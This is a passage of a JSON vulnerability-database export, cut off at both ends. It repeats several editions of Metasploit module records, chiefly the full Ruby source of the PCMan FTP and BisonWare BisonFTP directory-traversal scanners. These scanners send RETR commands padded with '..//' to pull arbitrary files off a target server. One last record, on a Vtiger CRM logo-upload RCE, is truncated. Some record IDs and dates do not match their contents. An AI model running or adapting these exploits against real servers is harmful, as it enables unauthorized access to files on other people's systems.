vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-27T02:37:42", "differentElements": ["cvelist", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 63}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "30e61a80bd64e31683a2cb002769a675", "type": "metasploit", "bulletinFamily": "exploit", "title": "PCMan FTP Server 2.0.7 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in PCMan FTP Server 2.0.7. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command that includes file system traversal strings such as '..//'\n", "published": "2015-11-08T05:08:23", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7601"], "cvelist": ["CVE-2015-7601"], "lastseen": "2019-07-05T05:34:43", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-06-27T02:37:42"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-06-27T02:37:42"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/pcman_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PCMan FTP Server 2.0.7 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in PCMan FTP Server 2.0.7.\n This vulnerability allows an attacker to download arbitrary files from the server by crafting\n a RETR command that includes file system traversal strings such as '..//'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts', # initial discovery\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38340'],\n [ 'CVE', '2015-7601']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n end\n\n def check_host(ip)\n begin\n connect\n if /220 PCMan's FTP Server 2\\.0/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n # Login anonymously and open the socket that we'll use for data retrieval.\n connect_login\n sock = data_connect\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file_path} not found\")\n return\n end\n\n if response_data.length == 0 or ! (res =~ /^150/ )\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"pcman.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-05T05:34:43", "differentElements": ["cvelist", "description", "published", "references", "sourceData", "sourceHref", "title"], "edition": 64}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-07-05T07:37:27", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-07-05T07:37:27"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-07-05T07:37:27"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-05T07:37:27", "differentElements": ["modified", "published"], "edition": 65}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "4a45d8a912178abfeaf285407e747950", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-07-12T04:17:48", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-07-12T04:17:48"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}], "modified": "2019-07-12T04:17:48"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-12T04:17:48", "differentElements": ["modified", "published"], "edition": 66}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-07-12T06:19:53", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-07-12T06:19:53"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-07-12T06:19:53"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-12T06:19:53", "differentElements": ["modified", "published"], "edition": 67}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "4a45d8a912178abfeaf285407e747950", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-07-21T20:48:47", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-07-12T06:19:53"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-07-12T06:19:53"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-21T20:48:47", "differentElements": ["modified", "published"], "edition": 68}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "6123eff5a71875b9e71ace97b1126d75", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-07-21T21:00:33", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2019-07-21T21:00:33"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2019-07-21T21:00:33"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-21T21:00:33", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 69}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "f56406218e2820490bbc2482df3669ed", "type": "metasploit", "bulletinFamily": "exploit", "title": "Vtiger CRM - Authenticated Logo Upload RCE", "description": "Vtiger 6.3.0 CRM's administration interface allows for the upload of a company logo. Instead of uploading an image, an attacker may choose to upload a file containing PHP code and run this code by accessing the resulting PHP file. This module was tested against vTiger CRM v6.3.0.\n", "published": "2018-07-17T23:28:33", "modified": "2018-07-30T17:15:59", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6000", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1713"], "cvelist": ["CVE-2015-6000", "CVE-2016-1713"], "lastseen": "2019-07-22T20:47:44", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2019-07-22T20:47:44"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-1713"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:32624", "SECURITYVULNS:VULN:14750"]}, {"type": "zdt", "idList": ["1337DAY-ID-30805", "1337DAY-ID-24304", "1337DAY-ID-30084"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/VTIGER_LOGO_UPLOAD_EXEC"]}, {"type": "packetstorm", "idList": 